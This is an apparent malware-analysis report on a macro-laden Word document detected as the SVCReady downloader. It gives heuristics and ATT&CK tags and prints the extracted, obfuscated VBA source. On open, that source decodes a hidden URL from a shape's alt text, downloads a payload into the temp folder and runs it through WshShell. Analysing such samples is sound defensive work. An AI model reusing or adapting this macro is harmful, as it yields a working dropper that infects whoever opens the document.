MALICIOUS
210
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The script attempts to download and execute a second-stage payload, indicated by the use of Shell() and the construction of a temporary file path. The presence of the 'Doc.Downloader.SVCReady' ClamAV detection further supports its malicious nature as a downloader.
Heuristics 7
-
ClamAV: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.SVCReady-8f5af0a5f0da7070-9951542-0
-
External relationship high OOXML_EXTERNAL_RELExternal target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack2\us.jpg
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2014/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexOOXML external relationship
- http://schemas.openxmlformats.org/markup-compatibility/2006OOXML external relationship
- http://schemas.microsoft.com/office/drawing/2016/inkOOXML external relationship
- http://schemas.microsoft.com/office/drawing/2017/model3dOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsOOXML external relationship
- http://schemas.openxmlformats.org/officeDocument/2006/mathOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingOOXML external relationship
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2012/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordml/cexOOXML external relationship
- http://schemas.microsoft.com/office/word/2016/wordml/cidOOXML external relationship
- http://schemas.microsoft.com/office/word/2018/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2015/wordml/symexOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkOOXML external relationship
- http://schemas.microsoft.com/office/word/2006/wordmlOOXML external relationship
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeOOXML external relationship
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3034 bytes |
SHA-256: d538e563ddf78fa997e0d432229c6963bf068a425b7fcdf497910850a5652860 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "f99f461a"
Function b7b5c4bb()
b7b5c4bb = ActiveWindow.Thumbnails
End Function
Function cb00873f()
cb00873f = -28193
End Function
Sub AutoOpen()
Dim f6fb0e08 As New f29b5957
aaa = b11c5ad6(db1352d4)
c23b860a = f6fb0e08.bf1f654d(aaa, "")
a1a5848a ee772f65, c23b860a
edbf5b4e = b11c5ad6(ActiveDocument.Shapes(1).Title)
Dim d6fedc24 As New WshShell
d6fedc24.exec "" & edbf5b4e & " " & ee772f65
End Sub
Attribute VB_Name = "cbcbdc0e"
Function dd46016c()
dd46016c = Application.ActiveDocument.Application
End Function
Function c503a09a()
c503a09a = ActiveWindow.Creator
End Function
Sub a1a5848a(e159db16, dd8b196a)
Dim dc283f0c
dc283f0c = FreeFile
Open e159db16 For Output As #dc283f0c
Print #dc283f0c, a5a3916b(dd8b196a)
Close #dc283f0c
End Sub
Function ee772f65()
ee772f65 = Environ("tmp") & "\main.theme"
End Function
Function ba92bae2()
ba92bae2 = "Libertarian confusingly warm louvres"
End Function
Function cc8cbc4d()
cc8cbc4d = Application.ActiveDocument.Creator
End Function
Function b11c5ad6(a655946f)
For a80a1858 = 1 To Len(a655946f) Step 3
b3f4034c = Mid(a655946f, a80a1858, 1)
b5bdd232 = b5bdd232 & b3f4034c
Next
b11c5ad6 = b5bdd232
End Function
Function e9130a0a()
e9130a0a = 28
End Function
Function ff5517cc()
ff5517cc = ActiveWindow.Visible
End Function
Sub b9ba7af0()
End Sub
Function c201cd3f()
c201cd3f = ActiveWindow.Left
End Function
Function a1a9e1d8()
a1a9e1d8 = 225926076 / 5524
End Function
Function a5a3916b(dd8b196a)
a5a3916b = StrConv(dd8b196a, 64)
End Function
Function b7dc5c3b()
b7dc5c3b = Application.ActiveDocument.AutoSaveOn
End Function
Function b465754b(d830b7d5np As String) As Boolean
If Len(d830b7d5np) > 802 Then
b465754b = False
End If
End Function
Function db1352d4()
db1352d4 = ActiveDocument.Shapes(1).AlternativeText
End Function
Attribute VB_Name = "f29b5957"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function c2f1cddb()
c2f1cddb = "Cobblers"
End Function
Function a4c005d1()
a4c005d1 = Application.ActiveDocument.AutoSaveOn
End Function
Function bf1f654d(b2cead74, a25c7873)
Dim e25ad0c3 As Object
Set e25ad0c3 = New MSXML2.XMLHTTP60
Call e25ad0c3.Open("GET", b2cead74, False)
e25ad0c3.Send
bf1f654d = e25ad0c3.responsebody
End Function
Function b997613d()
b997613d = Application.ActiveDocument.ActiveThemeDisplayName
End Function
Function b634ee16()
b634ee16 = ActiveWindow.HorizontalPercentScrolled
End Function
Function cbe86472(fd95eb8b)
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 23552 bytes |
SHA-256: eef80ffe16775a920e536c57d8ef8330cfb9c36dae99d6e338e0e362a26d0b63 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.